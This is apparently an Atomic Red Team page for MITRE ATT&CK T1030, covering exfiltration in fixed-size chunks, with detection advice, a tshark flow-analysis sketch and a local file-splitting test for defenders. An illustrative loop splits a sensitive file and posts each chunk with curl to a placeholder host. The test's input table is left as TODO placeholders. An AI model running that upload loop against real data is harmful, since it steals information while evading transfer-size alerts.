# T1030 - Data Transfer Size Limits

An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.
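For illustration only, a minimal shell sketch of this behavior might look like the following. The destination host, file paths, and chunk size are placeholders, not part of this technique's documentation: the file is split into fixed-size pieces and each piece is sent in its own request, so no single transfer exceeds a size threshold.

```sh
# Illustrative sketch only -- hostname and paths are hypothetical.
# Split the source file into 5,000,000-byte chunks, then send each chunk
# as a separate upload so no individual transfer trips a size threshold.
split -b 5000000 /path/to/sensitive-file /tmp/chunk.
for part in /tmp/chunk.*; do
  curl -s -X POST --data-binary @"$part" https://staging.example.com/upload
done
```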

Detection: Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). If a process maintains a long connection during which it consistently sends fixed size data packets or a process opens connections and sends fixed sized data packets at regular intervals, it may be performing an aggregate data transfer. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)
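As a rough illustration of the flow analysis described above, the sketch below (assuming a packet capture named `capture.pcap` and the `tshark` utility) tallies how often each destination receives frames of the same size; a destination dominated by a single repeated frame length is a candidate for a fixed-size chunked transfer.

```sh
# Sketch: count (destination, frame length) pairs from a capture.
# A destination receiving a large number of identically sized frames
# may be the endpoint of a fixed-size chunked transfer.
tshark -r capture.pcap -T fields -e ip.dst -e frame.len \
  | sort | uniq -c | sort -rn | head -n 20
```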

Platforms: Linux, macOS, Windows

Data Sources: Packet capture, Netflow/Enclave netflow, Process use of network, Process monitoring

Requires Network: Yes

## Atomic Tests


### Atomic Test #1 - Data Transfer Size Limits

Take a file or directory and split it into 5 MB chunks.

Supported Platforms: macOS, CentOS, Ubuntu, Linux

#### Inputs

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | TODO | todo | TODO |

#### Run it with `sh`!

```sh
cd /tmp/
# Create a 25 MB file of random data to act as the "victim" file
dd if=/dev/urandom of=/tmp/victim-whole-file bs=25M count=1
# Split it into 5,000,000-byte (~5 MB) chunks (default names xaa, xab, ...)
split -b 5000000 /tmp/victim-whole-file
# List the resulting chunks
ls -l
```
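As an optional check (not part of the original test), the chunks can be reassembled and compared against the source file to confirm the split was lossless:

```sh
# Optional verification: reassemble the split output (default names xaa, xab, ...)
# and confirm it is byte-identical to the original file.
cat /tmp/x?? > /tmp/victim-reassembled
cmp /tmp/victim-whole-file /tmp/victim-reassembled && echo "chunks match original"
```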